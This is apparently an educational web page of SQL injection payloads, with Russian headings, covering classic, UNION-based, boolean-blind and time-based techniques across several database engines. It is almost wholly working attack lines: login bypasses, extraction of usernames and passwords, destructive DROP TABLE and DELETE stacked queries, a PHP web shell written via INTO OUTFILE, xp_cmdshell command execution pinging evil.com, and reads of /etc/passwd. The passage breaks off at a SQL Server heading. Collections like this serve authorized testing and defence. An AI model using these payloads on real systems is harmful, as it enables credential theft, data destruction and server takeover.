Примеры SQL-инъекций
Образовательная коллекция полезных нагрузок (payloads) SQL-инъекций для тестирования безопасности, оценки уязвимостей и практики защитного кодирования
📝 Классические Паттерны SQL-инъекций sql
Фундаментальные методы SQL-инъекций - обход аутентификации, OR 1=1, UNION SELECT, инъекции на основе комментариев и перечисление баз данных
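# Classic SQL Injection Patterns
# Fundamental SQL injection techniques that form the basis for most attacks
# NOTE: use only against systems you are authorized to test. The "Stacked queries"
# and "SQL Server specific" sections change data or run OS commands; prefer
# non-destructive proofs (boolean/time probes, version strings) where they suffice.
# NOTE: MySQL treats "--" as a comment only when it is followed by whitespace. When
# the application appends its own closing quote right after the payload, use
# "-- " (trailing space), "--+" in URL-encoded parameters, or "#" instead.
# Authentication bypass with OR 1=1
' OR '1'='1
" OR "1"="1
' OR 1=1--
" OR 1=1--
' OR 'a'='a
" OR "a"="a
admin' OR '1'='1'--
admin" OR "1"="1"--
'or'1'='1
"or"1"="1
# Tautology-based injections (always true conditions)
# "#" is a MySQL-only line comment; whether an unterminated "/*" is accepted is
# engine-dependent, so prefer "--" or "#" when the target engine is unknown.
' OR 1=1#
' OR 1=1--
' OR 1=1/*
" OR 1=1#
" OR 1=1--
' OR '1'='1'#
" OR "1"="1"#
admin' OR '1'='1'#
admin" OR "1"="1"#
# Comment-based injections to bypass remaining query
' OR 1=1--
' OR 1=1#
' OR 1=1/*
" OR 1=1--
" OR 1=1#
" OR 1=1/*
' OR '1'='1'--
" OR "1"="1"--
# Union select for data extraction
# The UNION branch must return exactly as many columns as the original SELECT
# (count them with ORDER BY below). SQL Server, PostgreSQL and Oracle also require
# compatible column types, which is why NULL placeholders are tried first.
' UNION SELECT NULL--
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL, NULL--
" UNION SELECT NULL#
" UNION SELECT NULL, NULL#
" UNION SELECT NULL, NULL, NULL#
# Admin bypass with specific username
admin'--
admin'#
admin'/*
admin"--
admin"#
admin"/*
# Boolean-based testing
# Send the 1=1 and 1=2 forms as a pair and diff the responses; one request alone proves nothing.
' AND 1=1--
' AND 1=2--
' AND '1'='1
" AND "1"="1
' AND 'a'='a
" AND "a"="a
# Order by enumeration (column counting)
# The first n that errors ("Unknown column n in order clause" or similar) is one
# more than the column count of the original SELECT.
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 4--
1' ORDER BY 5--
1' ORDER BY 6--
1' ORDER BY 7--
1' ORDER BY 8--
1' ORDER BY 9--
1' ORDER BY 10--
# Error-based injection attempts
# CONVERT/TOP are SQL Server syntax. The CAST form leaks the first table name in the
# conversion error; the COUNT(*) form never errors and is a boolean probe, not error-based.
' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CAST((SELECT table_name FROM information_schema.tables) AS int)--
' AND 1=(SELECT COUNT(*) FROM information_schema.tables)--
# Time-based injection basics
# WAITFOR DELAY = SQL Server (a statement, so it follows the closing quote directly);
# SLEEP/BENCHMARK = MySQL (BENCHMARK is CPU-bound, its delay depends on host load);
# pg_sleep = PostgreSQL. pg_sleep() returns void, so "' OR pg_sleep(5)--" fails with
# "argument of OR must be type boolean" — use the scalar-subquery form instead.
' WAITFOR DELAY '00:00:05'--
' AND SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
' AND 1=(SELECT 1 FROM pg_sleep(5))--
# Stacked queries (multiple statements)
# Requires an API that executes several statements per call (SQL Server and PostgreSQL
# usually do; MySQL only with multi-statement support such as mysqli_multi_query or
# PDO). These payloads are DESTRUCTIVE — never run them outside an agreed scope with backups.
'; DROP TABLE users--
'; DROP TABLE users#
' ; DROP TABLE users --
'; DELETE FROM users WHERE '1'='1
'; INSERT INTO users (username, password) VALUES ('hacker', 'pwned')--
# Database version extraction
# @@version: MySQL and SQL Server; version(): MySQL and PostgreSQL; Oracle/SQLite see below.
' UNION SELECT @@version--
' UNION SELECT version()--
' UNION SELECT @@version, NULL, NULL--
' UNION SELECT version(), NULL, NULL, NULL--
# Table name enumeration
# information_schema exists on MySQL, PostgreSQL and SQL Server (not Oracle or SQLite);
# database() is MySQL-only, PostgreSQL uses current_database().
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT table_name, table_type FROM information_schema.tables--
' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema=database()--
# Column name enumeration
' UNION SELECT column_name FROM information_schema.columns--
' UNION SELECT column_name, data_type FROM information_schema.columns--
' UNION SELECT column_name, NULL, NULL FROM information_schema.columns WHERE table_name='users'--
# Data extraction from users table
' UNION SELECT username, password FROM users--
' UNION SELECT username, password, email FROM users--
' UNION SELECT NULL, username, password FROM users--
' UNION SELECT NULL, NULL, username, password FROM users--
# Bypassing login with comment truncation
admin'--
admin'#
admin'/*' OR '1'='1
admin'/*' OR '1'='1'--
# MySQL specific injections
' OR 1=1#
' OR 1=1--
' OR '1'='1'#
" OR "1"="1"#
' UNION SELECT database()#
' UNION SELECT user()#
' UNION SELECT @@version#
# SQL Server specific injections
# xp_cmdshell is disabled by default; enabling it needs sysadmin rights and
# sp_configure + RECONFIGURE (see the stored-procedure collection). EXEC is a
# statement, so it is stacked with ";" rather than joined with AND/OR.
' OR 1=1--
' UNION SELECT @@version--
' UNION SELECT db_name()--
' UNION SELECT system_user--
'; EXEC master..xp_cmdshell 'dir'--
# Oracle specific injections
' OR '1'='1'--
' UNION SELECT banner FROM v$version--
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
# PostgreSQL specific injections
' OR 1=1--
' UNION SELECT version()--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns--
' AND 1=(SELECT 1 FROM pg_sleep(5))--
# SQLite specific injections
' OR '1'='1'--
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name, sql FROM sqlite_master WHERE type='table'--
# Access control bypass
# LIMIT is MySQL/PostgreSQL/SQLite syntax (SQL Server: TOP, Oracle: ROWNUM / FETCH FIRST).
# "OR '1'='1' LIMIT 1" typically logs in as the first row in the table — often the admin.
' OR '1'='1' LIMIT 1--
' OR '1'='1' OR '1'='2--
admin' OR '1'='1'--
' OR user_id='admin'--
# Second-order injection (stored in database)
# In a second-order injection the payload is stored verbatim by one request (e.g. as a
# username at registration) and only fires later, when the stored value is concatenated
# into another query. The lines below are the stacked bodies of that later query; the
# first request merely has to persist them.
admin'; INSERT INTO logs (message) VALUES ('Hacked');--
admin'; DROP TABLE logs;--
# Blind SQL injection tests
# SUBSTRING/ASCII/database() here are MySQL spellings; see the blind collections for other engines.
' AND 1=1 AND '1'='1
' AND 1=2 AND '1'='1
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a
' AND ASCII(SUBSTRING((SELECT database()),1,1))>64
# Encoding bypass attempts
# First two lines decode to ' OR '1'='1 and ' UNION SELECT NULL--. The third is the
# backslash-prefixed variant of the first (decodes the same), presumably aimed at
# filters that strip "\" or double-decode — confirm against the target's decoder.
%27%20OR%20%271%27%3D%271
%27%20UNION%20SELECT%20NULL--
\%27\%20OR\%20\%271\%27=\%271
# HTTP parameter pollution
# Which duplicate the server sees is framework-specific (first value, last value, or
# both joined/arrayed); test the plain payload in each position before relying on it.
id=1' OR '1'='1&id=2
username=admin&username=' OR '1'='1
# Cookie-based injection
# Header/cookie injection only works where the application writes the value into SQL by
# concatenation (session lookup, audit or visitor logging); the header itself is not executed.
Cookie: sessionid=' OR '1'='1
Cookie: user_id=' UNION SELECT NULL--
# User-Agent injection
User-Agent: ' OR '1'='1
User-Agent: ' UNION SELECT @@version--
# Referer injection
Referer: ' OR '1'='1
Referer: ' UNION SELECT user()--
# X-Forwarded-For injection
X-Forwarded-For: ' OR '1'='1
X-Forwarded-For: ' UNION SELECT database()--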
📝 SQL-инъекции на основе UNION sql
Продвинутые SQL-инъекции, использующие UNION SELECT для извлечения данных из других таблиц — подбор числа столбцов, определение типа и версии СУБД (fingerprinting) и извлечение данных
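# UNION-based SQL Injection Vectors
# Advanced SQL injection using UNION SELECT to extract data from other tables
# NOTE: a UNION branch must match the original SELECT in column count and (on
# SQL Server, PostgreSQL and Oracle) in column types — establish the count with
# ORDER BY, then find a text-typed column with NULL placeholders before pulling data.
# NOTE: only payloads ending in "#" are MySQL-specific; "--" works everywhere but MySQL
# requires whitespace after it when the application appends a closing quote.
# Basic UNION syntax
' UNION SELECT NULL--
' UNION SELECT NULL, NULL--
' UNION SELECT NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL--
' UNION SELECT NULL, NULL, NULL, NULL, NULL--
" UNION SELECT NULL#
" UNION SELECT NULL, NULL#
" UNION SELECT NULL, NULL, NULL#
# Column enumeration with ORDER BY
# The first n that errors is one more than the number of columns in the original SELECT.
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' ORDER BY 4--
1' ORDER BY 5--
1' ORDER BY 6--
1' ORDER BY 7--
1' ORDER BY 8--
1' ORDER BY 9--
1' ORDER BY 10--
# Database fingerprinting
# @@version: MySQL / SQL Server; version(): MySQL / PostgreSQL; Oracle: banner FROM v$version.
' UNION SELECT @@version--
' UNION SELECT version()--
' UNION SELECT @@version, NULL--
' UNION SELECT version(), NULL, NULL--
' UNION SELECT @@version, NULL, NULL, NULL--
# Database name extraction
# database(): MySQL; db_name(): SQL Server; PostgreSQL uses current_database().
' UNION SELECT database()#
' UNION SELECT db_name()--
' UNION SELECT database(), NULL--
' UNION SELECT database(), NULL, NULL--
' UNION SELECT db_name(), NULL, NULL--
# Current user extraction
# user(): MySQL; system_user: SQL Server; current_user: PostgreSQL/SQL Server/Oracle.
' UNION SELECT user()#
' UNION SELECT system_user--
' UNION SELECT current_user--
' UNION SELECT user(), NULL--
' UNION SELECT system_user, NULL--
# Table enumeration
# table_schema=database() is MySQL; 'public' is the PostgreSQL default schema.
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT table_name, NULL FROM information_schema.tables--
' UNION SELECT table_name, table_type FROM information_schema.tables--
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()--
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='public'--
# Column enumeration
' UNION SELECT column_name FROM information_schema.columns--
' UNION SELECT column_name, data_type FROM information_schema.columns--
' UNION SELECT column_name, NULL, NULL FROM information_schema.columns--
' UNION SELECT column_name, data_type, character_maximum_length FROM information_schema.columns--
# Column enumeration for specific table
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT column_name, data_type FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users' AND table_schema=database()--
# Data extraction from users table
' UNION SELECT username, password FROM users--
' UNION SELECT username, password, email FROM users--
' UNION SELECT username, password, NULL FROM users--
' UNION SELECT NULL, username, password FROM users--
' UNION SELECT username, password FROM users WHERE '1'='1--
# Data extraction with specific conditions
# "SELECT *" only unions cleanly when users has exactly as many columns as the original query.
' UNION SELECT username, password FROM users WHERE username='admin'--
' UNION SELECT username, password FROM users WHERE id=1--
' UNION SELECT username, password FROM users WHERE user_id='admin'--
' UNION SELECT * FROM users--
# Multiple UNION operations
' UNION SELECT NULL, NULL UNION SELECT NULL, NULL--
' UNION SELECT username FROM users UNION SELECT password FROM users--
' UNION SELECT username FROM users UNION SELECT email FROM users UNION SELECT password FROM users--
# UNION with database functions
' UNION SELECT @@version, database(), user()--
' UNION SELECT version(), current_database(), current_user--
' UNION SELECT @@version, db_name(), system_user--
' UNION SELECT version(), database(), user(), NULL--
# UNION with string functions
# concat()/concat_ws(): MySQL (concat also PostgreSQL/SQL Server); "||" is concatenation on
# PostgreSQL/Oracle/SQLite but logical OR on MySQL unless PIPES_AS_CONCAT is set;
# group_concat(): MySQL/SQLite (PostgreSQL: string_agg, SQL Server 2017+: STRING_AGG).
' UNION SELECT concat(username, ':', password) FROM users--
' UNION SELECT concat_ws(':', username, password) FROM users--
' UNION SELECT username || ':' || password FROM users--
' UNION SELECT group_concat(username) FROM users--
# UNION with aggregate functions
' UNION SELECT COUNT(*) FROM users--
' UNION SELECT MAX(id), MIN(id) FROM users--
' UNION SELECT SUM(amount), AVG(amount) FROM transactions--
' UNION SELECT COUNT(DISTINCT username) FROM users--
# UNION with conditional logic
# CASE is portable; IF() is MySQL, IIF() is SQL Server 2012+ / SQLite 3.32+.
' UNION SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END--
' UNION SELECT CASE WHEN username='admin' THEN password ELSE NULL END FROM users--
' UNION SELECT IF(1=1, 'true', 'false')--
' UNION SELECT IIF(1=1, 'true', 'false')--
# UNION with subqueries
# A scalar subquery must return one row — hence LIMIT 1 (MySQL/PostgreSQL/SQLite;
# SQL Server: TOP 1, Oracle: ROWNUM=1).
' UNION SELECT (SELECT password FROM users WHERE username='admin')--
' UNION SELECT (SELECT COUNT(*) FROM information_schema.tables)--
' UNION SELECT (SELECT table_name FROM information_schema.tables LIMIT 1)--
# UNION ALL to include duplicates
' UNION ALL SELECT NULL--
' UNION ALL SELECT NULL, NULL--
' UNION ALL SELECT username, password FROM users--
' UNION ALL SELECT username FROM users UNION ALL SELECT password FROM users--
# UNION DISTINCT to remove duplicates
# Same as plain UNION; the explicit DISTINCT keyword is accepted by MySQL and PostgreSQL but not SQL Server.
' UNION DISTINCT SELECT username FROM users--
' UNION DISTINCT SELECT password FROM users--
' UNION DISTINCT SELECT email FROM users--
# MySQL specific UNION injections
# Reading mysql.user needs SELECT on the mysql schema; its password column was renamed
# authentication_string in MySQL 5.7.6+/8.0, so the concat line needs adjusting there.
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema=database()#
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'#
' UNION SELECT concat(user, ':', password) FROM mysql.user#
' UNION SELECT grantee, privilege_type FROM information_schema.user_privileges#
# SQL Server specific UNION injections
' UNION SELECT name FROM sys.tables--
' UNION SELECT name FROM sys.columns WHERE object_id=OBJECT_ID('users')--
' UNION SELECT name, type_desc FROM sys.tables--
' UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE='BASE TABLE'--
# Oracle specific UNION injections
' UNION SELECT table_name FROM all_tables--
' UNION SELECT column_name FROM all_tab_columns WHERE table_name='USERS'--
' UNION SELECT banner FROM v$version--
' UNION SELECT owner, table_name FROM all_tables--
# PostgreSQL specific UNION injections
' UNION SELECT table_name FROM information_schema.tables WHERE table_schema='public'--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT datname FROM pg_database--
' UNION SELECT usename FROM pg_user--
# SQLite specific UNION injections
' UNION SELECT sql FROM sqlite_master--
' UNION SELECT name, sql FROM sqlite_master WHERE type='table'--
' UNION SELECT tbl_name FROM sqlite_master WHERE type='table'--
' UNION SELECT sql FROM sqlite_master WHERE type='index'--
# UNION with time delays
# pg_sleep() returns void, which cannot be unioned with a typed column — select NULL
# FROM it instead. WAITFOR DELAY is a statement, not an expression, so on SQL Server it
# is stacked rather than placed in a SELECT list.
' UNION SELECT SLEEP(5)--
' UNION SELECT NULL FROM pg_sleep(5)--
'; WAITFOR DELAY '00:00:05'--
' UNION SELECT BENCHMARK(5000000, MD5(1))--
# UNION with file operations (MySQL)
# Needs the FILE privilege, a secure_file_priv setting that allows the path (modern
# defaults restrict or disable it), a directory writable by the mysqld OS user and a
# web root the attacker can reach. The first OUTFILE line writes the row "1 2 3", not a shell.
' UNION SELECT LOAD_FILE('/etc/passwd')--
' UNION SELECT 1,2,3 INTO OUTFILE '/var/www/html/shell.php'--
' UNION SELECT NULL, '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/cmd.php'--
# UNION with system commands (SQL Server)
# EXEC is a statement and cannot appear inside a SELECT list; command execution is a
# stacked statement. xp_cmdshell is disabled by default and needs sysadmin to enable.
'; EXEC master..xp_cmdshell 'dir'--
'; EXEC master..xp_cmdshell 'ping evil.com'--
# Advanced data extraction techniques
# group_concat() is capped by group_concat_max_len (default 1024 bytes); page with LIMIT/OFFSET for long lists.
' UNION SELECT group_concat(concat(username, ':', password)) FROM users--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1--
' UNION SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 2--
# UNION with JOIN operations
' UNION SELECT u.username, u.password, r.role_name FROM users u JOIN roles r ON u.role_id = r.id--
' UNION SELECT t1.column1, t2.column2 FROM table1 t1 JOIN table2 t2 ON t1.id = t2.id--
# Error-based UNION injections
# (These are error-based, not UNION, payloads in SQL Server CONVERT/TOP syntax; kept here
# because they are the usual fallback when no UNION column is reflected.)
' AND 1=CONVERT(int, (SELECT TOP 1 table_name FROM information_schema.tables))--
' AND 1=CAST((SELECT table_name FROM information_schema.tables) AS int)--
' AND 1=(SELECT COUNT(*) FROM information_schema.tables)--
# Blind UNION injections
# (Boolean-based probes, not UNION: each needs a TRUE/FALSE pair to compare responses.
# LENGTH() is LEN() on SQL Server; database() is MySQL-only.)
' AND (SELECT COUNT(*) FROM information_schema.tables) > 5--
' AND (SELECT LENGTH((SELECT password FROM users WHERE username='admin'))) > 5--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 64--
' AND (SELECT SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) = 'a'--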
📝 Слепые SQL-инъекции на основе логических значений sql
Слепые SQL-инъекции, эксплуатирующие условия истинности/ложности - перечисление баз данных, извлечение данных через булеву логику и условное тестирование
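# Boolean-based Blind SQL Injection Vectors
# SQL injection techniques that exploit true/false conditions without returning data
# NOTE: always send each probe together with its negation (1=1 / 1=2) and diff the
# responses; a single request proves nothing. Uncorrelated scalar subqueries must return
# at most one row (MySQL: "Subquery returns more than 1 row"), which is why LIMIT 1 is used.
# NOTE: function names are engine-specific: database(), VERSION(), BINARY(), IF() are
# MySQL; current_database(), pg_* are PostgreSQL; db_name(), system_user are SQL Server
# (where LENGTH() is LEN()); v$version, all_tables, dual are Oracle; sqlite_master is SQLite.
# MySQL needs whitespace after "--" when the application appends a closing quote.
# Basic boolean testing
' AND 1=1--
' AND 1=2--
' AND '1'='1
" AND "1"="1
' AND 'a'='a
" AND "a"="a
# Tautology-based boolean injections
' OR 1=1--
' OR '1'='1
" OR 1=1--
" OR "1"="1
admin' OR '1'='1'--
admin" OR "1"="1"--
# Contradiction-based boolean injections
' AND 1=2--
' AND '1'='2
" AND 1=2--
" AND "1"="2
admin' AND '1'='2'--
# Subquery boolean testing
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables) > 5--
' AND (SELECT COUNT(*) FROM information_schema.columns) > 10--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') = 1--
# Database name length checking
' AND LENGTH((SELECT database())) > 0--
' AND LENGTH((SELECT database())) > 5--
' AND LENGTH((SELECT database())) = 8--
' AND LENGTH((SELECT database())) < 10--
# Database name character by character extraction
# Binary-search the ASCII value (> 64, > 96, ...) rather than testing each code point: ~7 requests per character.
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 64--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 96--
' AND ASCII(SUBSTRING((SELECT database()),1,1)) = 115--
' AND ASCII(SUBSTRING((SELECT database()),2,1)) > 64--
' AND ASCII(SUBSTRING((SELECT database()),2,1)) = 101--
# Table name existence checking
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users') = 1--
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name='users') > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables WHERE table_name LIKE 'user%') > 0--
# Table name length checking
' AND LENGTH((SELECT table_name FROM information_schema.tables LIMIT 1)) > 0--
' AND LENGTH((SELECT table_name FROM information_schema.tables LIMIT 1)) = 5--
' AND LENGTH((SELECT table_name FROM information_schema.tables WHERE table_name='users')) = 5--
# Column name existence checking
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE column_name='password') > 0--
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE column_name='username') > 0--
' AND (SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users' AND column_name='password') = 1--
# Data existence checking
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin' AND password='password123') > 0--
' AND (SELECT COUNT(*) FROM users WHERE username='admin') = 1--
# Password length checking
# A length of 32 or 64 hex characters usually means a stored MD5/SHA-256 digest, not a plaintext password.
' AND LENGTH((SELECT password FROM users WHERE username='admin')) > 0--
' AND LENGTH((SELECT password FROM users WHERE username='admin')) = 32--
' AND LENGTH((SELECT password FROM users WHERE username='admin')) < 64--
# Password character by character extraction
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) > 64--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)) = 97--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1)) > 64--
' AND ASCII(SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1)) = 98--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1) = 'a'--
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),2,1) = 'b'--
# Version checking
# VERSION() exists on MySQL and PostgreSQL; SQL Server uses @@VERSION.
' AND (SELECT LENGTH(VERSION())) = 23--
' AND ASCII(SUBSTRING(VERSION(),1,1)) > 48--
' AND ASCII(SUBSTRING(VERSION(),1,1)) = 53--
' AND SUBSTRING(VERSION(),1,1) = '5'--
# User checking
# No engine has an information_schema.users view: use mysql.user (MySQL), pg_user/pg_roles
# (PostgreSQL) or sys.server_principals (SQL Server). USER()/CURRENT_USER() return one
# string of the form user@host, so the comparison literal is a single quoted value.
' AND (SELECT COUNT(*) FROM mysql.user WHERE user='root') > 0--
' AND (SELECT USER()) = 'root@localhost'--
' AND (SELECT CURRENT_USER()) = 'admin@%'--
# Privilege checking
# MySQL: information_schema.user_privileges / mysql.user. Oracle: session_roles lists the
# roles enabled for the current session (DBMS_SESSION.IS_ROLE_ENABLED is PL/SQL-only).
' AND (SELECT COUNT(*) FROM information_schema.user_privileges WHERE grantee LIKE '%admin%') > 0--
' AND (SELECT super_priv FROM mysql.user WHERE user='root') = 'Y'--
' AND (SELECT COUNT(*) FROM session_roles WHERE role='DBA') > 0--
# File existence checking (MySQL)
# information_schema.files lists InnoDB tablespace/log files, not OS files, so the first
# probe cannot see /etc/passwd. LOAD_FILE() returns NULL when the file is absent, unreadable
# by the mysqld OS user, blocked by secure_file_priv, or the FILE privilege is missing —
# that NULL/non-NULL difference is the usable oracle.
' AND (SELECT COUNT(*) FROM information_schema.files WHERE file_name='/etc/passwd') > 0--
' AND LOAD_FILE('/etc/passwd') IS NOT NULL--
# Conditional error-based boolean
# The "SELECT 1 FROM <table>" forms raise a multi-row subquery error whenever the table has
# more than one row; that error (vs. none) is the signal.
' AND (SELECT 1 FROM information_schema.tables) = 1--
' AND (SELECT 1 FROM users WHERE username='admin') = 1--
' AND (SELECT COUNT(*) FROM users) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables) > 0--
# Time-based boolean variations
# pg_sleep() returns void and cannot be an AND operand ("argument of AND must be type
# boolean"); WAITFOR DELAY is a statement and must be stacked (wrap it in IF (...) for a
# conditional delay). See the time-based collection for the per-engine forms.
' AND SLEEP(5)--
' AND 1=(SELECT 1 FROM pg_sleep(5))--
'; WAITFOR DELAY '00:00:05'--
' AND BENCHMARK(5000000, MD5(1))--
# Case sensitivity testing (BINARY is MySQL-only; elsewhere compare with a case-sensitive COLLATE)
' AND BINARY('admin') = 'admin'--
' AND BINARY('ADMIN') = 'admin'--
' AND BINARY((SELECT username FROM users WHERE id=1)) = 'admin'--
# NULL testing
' AND (SELECT password FROM users WHERE username='admin') IS NULL--
' AND (SELECT COUNT(*) FROM users WHERE password IS NULL) > 0--
' AND (SELECT email FROM users WHERE username='admin') IS NOT NULL--
# Range-based boolean testing
' AND (SELECT COUNT(*) FROM users) BETWEEN 1 AND 100--
' AND (SELECT COUNT(*) FROM users) >= 10--
' AND (SELECT COUNT(*) FROM users) <= 1000--
' AND (SELECT id FROM users WHERE username='admin') BETWEEN 1 AND 100--
# Pattern matching boolean
' AND (SELECT username FROM users WHERE id=1) LIKE 'admin%'--
' AND (SELECT password FROM users WHERE username='admin') LIKE '%123%'--
' AND (SELECT email FROM users WHERE username='admin') LIKE '%@example.com'--
' AND (SELECT database()) LIKE 'test%'--
# String comparison boolean
' AND (SELECT database()) = 'testdb'--
' AND (SELECT username FROM users WHERE id=1) = 'admin'--
' AND (SELECT password FROM users WHERE username='admin') = 'password123'--
' AND (SELECT table_name FROM information_schema.tables LIMIT 1) = 'users'--
# Numeric comparison boolean
' AND (SELECT COUNT(*) FROM users) > 10--
' AND (SELECT id FROM users WHERE username='admin') = 1--
' AND (SELECT LENGTH(password) FROM users WHERE username='admin') = 32--
' AND (SELECT ASCII(SUBSTRING(password,1,1)) FROM users WHERE username='admin') = 97--
# Boolean logic combinations
' AND 1=1 AND 2=2--
' AND 1=1 AND 2=3--
' AND (1=1 OR 2=2) AND 3=3--
' AND ((1=1) OR (2=2)) AND (3=3 OR 4=4)--
# Nested boolean conditions
' AND ((SELECT COUNT(*) FROM users) > 0 AND (SELECT COUNT(*) FROM admins) > 0)--
' AND ((SELECT database()) = 'testdb' OR (SELECT database()) = 'devdb')--
' AND (LENGTH((SELECT password FROM users WHERE username='admin')) > 0 AND LENGTH((SELECT password FROM users WHERE username='admin')) < 64)--
# Boolean with GROUP BY
' AND (SELECT COUNT(*) FROM (SELECT username FROM users GROUP BY username) AS temp) > 0--
' AND (SELECT COUNT(DISTINCT username) FROM users) > 10--
# Boolean with HAVING
# These subqueries return one row per qualifying group; with two or more such groups the
# scalar comparison errors (MySQL: "Subquery returns more than 1 row") instead of answering.
# Wrap them as SELECT COUNT(*) FROM (...) AS t for a reliable probe.
' AND (SELECT COUNT(*) FROM users GROUP BY username HAVING COUNT(*) > 1) > 0--
' AND (SELECT COUNT(*) FROM information_schema.tables GROUP BY table_schema HAVING COUNT(*) > 5) > 0--
# Boolean with ORDER BY
' AND (SELECT username FROM users ORDER BY username LIMIT 1) = 'admin'--
' AND (SELECT table_name FROM information_schema.tables ORDER BY table_name LIMIT 1) = 'accounts'--
# Boolean with LIMIT and OFFSET
# Without ORDER BY the row returned for a given OFFSET is not guaranteed to be stable between requests.
' AND (SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 0) = 'users'--
' AND (SELECT table_name FROM information_schema.tables LIMIT 1 OFFSET 1) = 'accounts'--
' AND (SELECT username FROM users LIMIT 1 OFFSET 0) = 'admin'--
# Database-specific boolean injections
# MySQL
' AND (SELECT @@version) = '5.7.25'--
' AND (SELECT database()) = 'testdb'--
' AND (SELECT user()) = 'root@localhost'--
# SQL Server
' AND (SELECT @@version) LIKE '%SQL Server%'--
' AND (SELECT db_name()) = 'testdb'--
' AND (SELECT system_user) = 'dbo'--
# Oracle
' AND (SELECT banner FROM v$version WHERE ROWNUM=1) LIKE '%Oracle%'--
' AND (SELECT user FROM dual) = 'ADMIN'--
' AND (SELECT table_name FROM all_tables WHERE ROWNUM=1) = 'USERS'--
# PostgreSQL
' AND (SELECT version()) LIKE '%PostgreSQL%'--
' AND (SELECT current_database()) = 'testdb'--
' AND (SELECT current_user) = 'postgres'--
# SQLite
' AND (SELECT sql FROM sqlite_master WHERE type='table' LIMIT 1) LIKE '%users%'--
' AND (SELECT name FROM sqlite_master WHERE type='table' LIMIT 1) = 'users'--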
📝 Слепые SQL-инъекции на основе времени sql
SQL-инъекции, использующие время отклика базы данных - SLEEP(), WAITFOR DELAY, BENCHMARK() и методы извлечения данных на основе времени
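# Time-based Blind SQL Injection Vectors
# SQL injection techniques that use database response time to extract data
# NOTE: measure a baseline first and repeat every positive probe — network jitter and
# server load cause false positives, and BENCHMARK() is CPU-bound so its delay varies
# with the host. Long delays on a shared or low-capacity host can take the service down.
# NOTE: pg_sleep() returns void, so PostgreSQL rejects "AND pg_sleep(5)" with "argument
# of AND must be type boolean". Usable forms: 1=(SELECT 1 FROM pg_sleep(n)), a CASE
# inside that subquery for conditional delays, or a stacked "; SELECT pg_sleep(n)".
# PostgreSQL has no database(); use current_database().
# NOTE: T-SQL WAITFOR DELAY is a statement, not an expression: it cannot follow AND/OR
# and cannot take a CASE. Conditional delays are written "; IF (cond) WAITFOR DELAY '...'".
# NOTE: Oracle needs a relational operator in WHERE and most drivers refuse stacked
# statements, so DBMS_PIPE.RECEIVE_MESSAGE('x', n)=1 inside the condition is the usable form.
# Basic time-based injections
' WAITFOR DELAY '00:00:05'--
'; WAITFOR DELAY '0:0:5'--
' AND SLEEP(5)--
' OR SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
' AND 1=(SELECT 1 FROM pg_sleep(5))--
'; SELECT SLEEP(5)--
' AND DBMS_PIPE.RECEIVE_MESSAGE('x', 5)=1--
# MySQL time-based injections
# SLEEP() runs once per row evaluated, so "OR SLEEP(5)" on a large table multiplies the delay.
' AND SLEEP(5)--
' OR SLEEP(10)--
' AND BENCHMARK(5000000, MD5(1))--
' AND BENCHMARK(50000000, MD5(1))--
' OR BENCHMARK(5000000, SHA1(1))--
' AND SLEEP(5) AND '1'='1
' AND SLEEP(10) AND 'a'='a
' OR SLEEP(5)--
' OR BENCHMARK(5000000, MD5(1))--
'; SELECT SLEEP(5)--
# SQL Server time-based injections
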